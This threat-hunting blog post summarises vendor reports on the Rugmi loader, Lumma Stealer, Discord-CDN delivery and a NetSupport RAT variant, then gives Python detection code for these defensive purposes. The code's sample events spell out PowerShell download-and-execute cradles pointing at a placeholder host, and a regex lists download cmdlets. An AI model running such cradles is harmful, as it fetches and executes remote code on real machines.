Enter the Cyber Battlefield: The Rise of Sneaky Malware Loaders and Stealthy Stealers — A Dive into ESET’s Trojan Saga, Discord’s Dark Side, and McAfee’s RAT Revelation.
Happy Threat Hunt Thursday!
A fresh strain of malware loaders has surfaced, ushering in a wave of information-stealing threats like Lumma Stealer (also known as LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms, according to cybersecurity experts at ESET.
The trojan, dubbed Win/TrojanDownloader.Rugmi by ESET, is a multifaceted threat comprising a downloader for encrypted payloads, an internal resource-based loader, and an external file-based loader to execute the payload, as stated in the Threat Report H2 2023 from the company.
Data gathered from ESET’s telemetry indicates a noticeable surge in detections of the Rugmi loader during October and November 2023, skyrocketing from a few daily instances to hundreds per day.
Typically distributed under a malware-as-a-service (MaaS) model, stealers like Lumma Stealer are available for subscription to other threat actors. For example, Lumma Stealer is being peddled in underground forums at $250 per month, with a top-tier plan priced at $20,000, granting purchasers access to the source code and resale rights.
Connections have been drawn between the codebases of Mars, Arkei, Vidar stealers, and the creation of Lumma, indicating a potential repurposing of existing code.
To evade detection, this off-the-shelf tool employs various distribution methods, spanning from malvertising and fake browser updates to pirated installers of popular software such as VLC media player and OpenAI ChatGPT.
An alternate tactic observed involves the abuse of Discord’s content delivery network (CDN) for hosting and disseminating malware. Trend Micro’s October 2023 report highlighted how compromised and random Discord accounts are utilized to send direct messages offering recipients $10 or a Discord Nitro subscription in exchange for aiding a supposed project. Those agreeing to the offer receive an executable file from Discord’s CDN, disguised as iMagic Inventory but containing the Lumma Stealer payload.
“Easily accessible malware tools contribute significantly to the proliferation of malicious activities, even among less technically proficient threat actors,” notes ESET. “The expanding range of functions offered by Lumma Stealer further enhances its appeal as a product.”
Meanwhile, McAfee Labs uncovered a new iteration of NetSupport RAT, derived from its legitimate counterpart, the NetSupport Manager remote administration tool. This variant, employed by initial access brokers, is used for data collection and additional actions on targeted victims.
McAfee outlined the attack’s initial phase, which involves obfuscated JavaScript files serving as the entry point. The JavaScript launches PowerShell commands that fetch the remote-control tool and stealers from a server controlled by the threat actors. The campaign primarily targets the U.S. and Canada, showcasing the evolving tactics employed by cybercriminals.
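The two delivery chains summarized above (a script host spawning PowerShell to pull payloads from a remote server, and executables handed out through Discord's CDN) both leave footprints a defender can hunt for. The following Python is an added example, not code from ESET, Trend Micro or McAfee: it runs two simple detections over constructed sample data. The process-event format (`parent|image|command_line`), the proxy-log format (`client url status`), the hostname `cdn.discordapp.com` and every path and URL in the samples are assumptions made for the illustration, not values taken from the reports.

```python
import re
from urllib.parse import urlparse

# --- Constructed sample telemetry (not from the page) ---------------------
# Process-creation events in a simplified "parent|image|command_line" form.
PROCESS_EVENTS = [
    r"C:\Windows\System32\wscript.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
    r"C:\Windows\explorer.exe|C:\Program Files\Notepad++\notepad++.exe|notepad++.exe report.txt",
    r"C:\Windows\System32\cscript.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell.exe -NoProfile -Command Invoke-WebRequest -Uri http://example.invalid/x -OutFile C:\Users\Public\x.exe",
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell Get-ChildItem",
]

# Web-proxy lines in a simplified "client url status" form (constructed).
PROXY_LINES = [
    "10.0.0.5 https://cdn.discordapp.com/attachments/000/000/iMagic_Inventory_Setup.exe 200",
    "10.0.0.7 https://cdn.discordapp.com/attachments/000/000/screenshot.png 200",
    "10.0.0.9 https://example.invalid/update.exe 200",
]

# --- Detection 1: Windows script host -> PowerShell with a download cradle -
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Cmdlets / .NET members commonly used to fetch and run remote content.
DOWNLOAD_MARKERS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer"
    r"|net\.webclient|invoke-expression|\biex\b",
    re.IGNORECASE,
)


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_process_event(line):
    """Split one constructed 'parent|image|command_line' record into fields."""
    parent, image, cmdline = line.split("|", 2)
    return {"parent": basename(parent), "image": basename(image), "cmdline": cmdline}


def flag_script_host_downloads(lines):
    """Return events where a script host launched PowerShell with a download marker."""
    hits = []
    for line in lines:
        ev = parse_process_event(line)
        if (ev["parent"] in SCRIPT_HOSTS
                and ev["image"] in POWERSHELL
                and DOWNLOAD_MARKERS.search(ev["cmdline"])):
            hits.append(ev)
    return hits


# --- Detection 2: executable fetched from the Discord CDN -------------------
# Assumed CDN hostname; extend to other attachment hosts as your proxy shows them.
DISCORD_CDN_HOSTS = {"cdn.discordapp.com"}
EXEC_EXTENSIONS = (".exe", ".scr", ".msi", ".bat", ".cmd", ".js", ".vbs", ".dll")


def flag_discord_cdn_executables(proxy_lines):
    """Return (client, url) pairs for executable-looking downloads from the Discord CDN."""
    hits = []
    for line in proxy_lines:
        client, url = line.split()[:2]
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if host in DISCORD_CDN_HOSTS and parsed.path.lower().endswith(EXEC_EXTENSIONS):
            hits.append((client, url))
    return hits


if __name__ == "__main__":
    for ev in flag_script_host_downloads(PROCESS_EVENTS):
        print(f"[script-host -> PowerShell download] {ev['parent']} -> {ev['cmdline']}")
    for client, url in flag_discord_cdn_executables(PROXY_LINES):
        print(f"[Discord CDN executable] {client} fetched {url}")
```

Both checks are deliberately narrow so they stay readable; in practice the first one is the higher-signal hunt, because a script host parenting PowerShell that references a download cmdlet is rare on well-managed endpoints, whereas Discord CDN executable downloads need to be weighed against how much legitimate Discord use your environment has.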
Happy Hunting!
-threathuntress